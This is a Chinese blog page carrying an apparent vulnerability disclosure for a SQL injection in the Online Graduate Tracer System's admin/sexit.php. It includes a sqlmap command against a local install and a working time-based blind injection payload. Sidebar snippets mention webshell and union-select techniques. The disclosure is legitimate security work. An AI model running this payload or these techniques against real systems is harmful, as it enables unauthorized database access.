Online Graduate Tracer System sexit.php sql injection

最新推荐文章于 2024-09-17 20:18:24 发布
最新推荐文章于 2024-09-17 20:18:24 发布
阅读量9.6k 收藏
点赞数
文章标签: php sql 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43864034/article/details/132508000
版权

Online Graduate Tracer System sexit.php sql injection
url:tracking/admin/sexit.php

Abstract:

Line 142 of sexit.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

Explanation:

SQL injection errors occur when:

Data enters a program from an untrusted source.
The data is used to dynamically construct a SQL query.

In this case the data is passed to mysqli_query() in sexit.php at line 142.
在这里插入图片描述
在这里插入图片描述

sqlmap.py -u "http://127.0.0.1/shenji/tracking/admin/sexit.php?id=1"

---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1550 FROM (SELECT(SLEEP(5)))fOxo) AND 'GLQe'='GLQe
---

在这里插入图片描述
在这里插入图片描述
Download Code:
https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html

@sec
关注
Packet_Tracer使用教程.zip
06-25
Packet Tracer是一款由Cisco Systems开发的强大网络模拟和可视化工具,主要服务于网络教育和学习,它允许用户构建、配置、分析和故障排查网络拓扑。这个“Packet Tracer使用教程.zip”压缩包文件很可能是为了帮助...
Cisco Packet Tracer v7.0 .7z
04-01
第一步:打开压缩包,我选择的是PacketTracer70_64bit_setup.exe 。 第二步 一路默认next即可,记得选择我接受(中途可以更换安装目录,自己随意),我选择的是 D:\Cisco Packet Tracer 7.0 第三步安装完成之后,...
Cisco Packet Tracer 8.1.1.0022
06-14
Cisco Packet Tracer 是一款创新的可视化模拟工具,可用于在台式机上练习网络部署、物联网和网络安全技能。 借助 Cisco Packet Tracer,您可以: 将知识付诸实践 准备证书考试 磨练面试技能 Packet Tracer 是一个...
accumulo-tracer-1.6.1.jar
07-17
标签:accumulo-tracer-1.6.1.jar,accumulo,tracer,1.6.1,jar包下载,依赖包
cisco_Packet_Tracer 实战攻略.pdf
07-06
packet tracer是学习网络知识的亲们的不可多得的模拟网络环境的一个很好用的软件。思科模拟器PacketTracer是学习思科课程必用的模拟器之一。本课程通过一些小实验带领大家了解cisco_packet_tracer实战攻略
SEAFARING靶场渗透
kknifek的博客
09-13 545
??echo '<??
dedecms(四种webshell姿势)
2301_81881972的博客
09-14 982
点击【系统】【sql命令行工具】--》多行命令中输入select '<?>' into outfile '+路径+创建文件名。与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下。点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】账号密码同为admin。
Netty笔记03-组件Channel
weixin_46425661的博客
09-12 845
本文主要讲解Netty中的组件Channel、ChannelFuture和CloseFuture
CTFShow-反序列化
最新发布
qq_66013948的博客
09-17 581
private变量会被序列化为:\x00类名\x00变量名protected变量会被序列化为: \x00*\x00变量名public变量会被序列化为:变量名__sleep() //在对象被序列化之前运行 *__wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过) *如果类中同时定义了 __unserialize() 和 __wakeup() 两个魔术方法, 则只有 __unserialize() 方法会生效,
YOLOv9改进系列,YOLOv9主干网络替换为RepViT (CVPR 2024,清华提出,独家首发),助力涨点
weixin_44779079的博客
09-17 378
YOLOv9主干网络替换为RepViT,助力涨点,通过结合轻量级ViTs的架构设计,重新审视了轻量级CNNs的高效设计,最终得到了RepViT,这是一种为资源受限的移动设备设计的全新轻量级CNN家族。RepViT在多个视觉任务中超越了现有的轻量级ViTs和CNNs,表现出了优异的性能和延迟,突显了纯轻量级CNNs在移动设备上应用的广阔前景。
【网络安全】-rce漏洞-pikachu
weixin_65311462的博客
09-12 1132
由于应用程序在处理用户输入时未能正确验证、过滤或限制输入数据,导致hacker能通过网络在目标系统上执行任意代码或命令,从而完全控制受影响的系统。RCE漏洞是一种严重的安全漏洞类型,对系统安全构成重大威胁。
【getshell】phpmyadmin后台getshell(4.8.5)
m0_71944965的博客
09-11 745
访问一下 最后getshell
【渗透测试】——Upload靶场实战(1-5关)
HinsCoder的博客
09-16 660
upload-labs是一个使用 php 语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共21关,每一关都包含着不同上传方式。
PHP随时随地预订民宿酒店预订系统小程序源码
2401_84413903的博客
09-12 610
在这个快节奏的时代里,“随时随地预订民宿酒店预订系统”无疑成为了我们旅行中的得力助手。它不仅让我们摆脱了繁琐的预订流程和时间限制,更让我们能够随心所欲地规划自己的旅行路线和住宿体验。无论你是想要一场说走就走的旅行,还是想要精心策划一次难忘的假期,都不妨试试这个预订系统吧!相信它一定会让你的旅行变得更加自由、便捷和美好!
PHP在现代Web开发中的高效应用与最佳实践
运维人生
09-13 1095
我们将使用Laravel框架来构建一个简单的博客系统,该系统包括文章发布、编辑、查看和评论等功能。PHP作为一门成熟且强大的服务器端脚本语言,在现代Web开发中依然扮演着重要角色。通过遵循最佳实践、利用现代PHP版本的特性和成熟的框架与组件,开发者可以高效构建出稳定、安全、可扩展的Web应用。本文通过一个简单的博客系统案例,展示了PHP在实际项目中的应用方法和技巧,希望能为PHP开发者提供一些有益的参考和启发。
CISP-PTE CMS sqlgun靶场
2301_81525518的博客
09-13 665
输入 -1' union select 1,2,3# 有回显可以查看数据库。sql靶场有个搜索框先点一下go,有回显说明存在漏洞。查询它的数据这里admin用户的密码是md5加密。有个phpinfo.php点进去可以看到路径。然后扫描ip目录发现没有后台登录的地方。然后在这里尝试sql注入。来到根目录有个flag。然后查询数据库,用户。
php 实现JWT
Crazy_shark的博客
09-11 746
PHP 中,JSON Web Token (JWT) 是一种开放标准 (RFC 7519) 用于在各方之间作为 JSON 对象安全地传输信息。JWT 通常用于身份验证系统,如 OAuth2 或基于令牌的身份验证。以下是一个基本的 PHP 实现 JWT 生成和验证的代码示例。
LAMP+WordPress
2301_78088515的博客
09-15 1323
LAMP—L:linux——操作系统,提供服务器运行的基础环境。A:apache(httpd)——网页服务器软件,负责处理HTTP请求和提供网页内容。M:mysql,mariadb——数据库管理系统,用于存储网站数据。P:php,perl,python——服务器端脚本语言,用于生成动态网页内容。WordPress是一个开源的内容管理系统,最初于2003年被开发用来简化个人在线写作,但随着时间的发展,它已经成长为一个全功能的网站框架。WordPress使用PHP编写,使用MySQL作为数据库管理系统。
PHP高效协同无缝对接一站式生产管理系统小程序源码
2401_84414018的博客
09-13 496
在这个日新月异的时代,选择一款适合自己的生产管理系统是企业实现智能化转型的关键一步。“高效协同无缝对接一站式生产管理系统”以其独特的优势和魅力,正引领着越来越多的企业走向更加高效、智能的生产管理模式。如果你也想在激烈的市场竞争中脱颖而出,那么不妨考虑引入这样一款系统吧!相信它一定会成为你企业发展的重要助力!
在packet tracer 如何2.添加路由器串口
06-07
在Packet Tracer中添加路由器串口的步骤如下: 1. 打开Packet Tracer,选中左侧的“路由器”工具栏。 2. 拖动一个路由器到画布上,右键单击路由器并选择“配置”。 3. 在路由器的配置界面中,选择“物理”选项卡...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值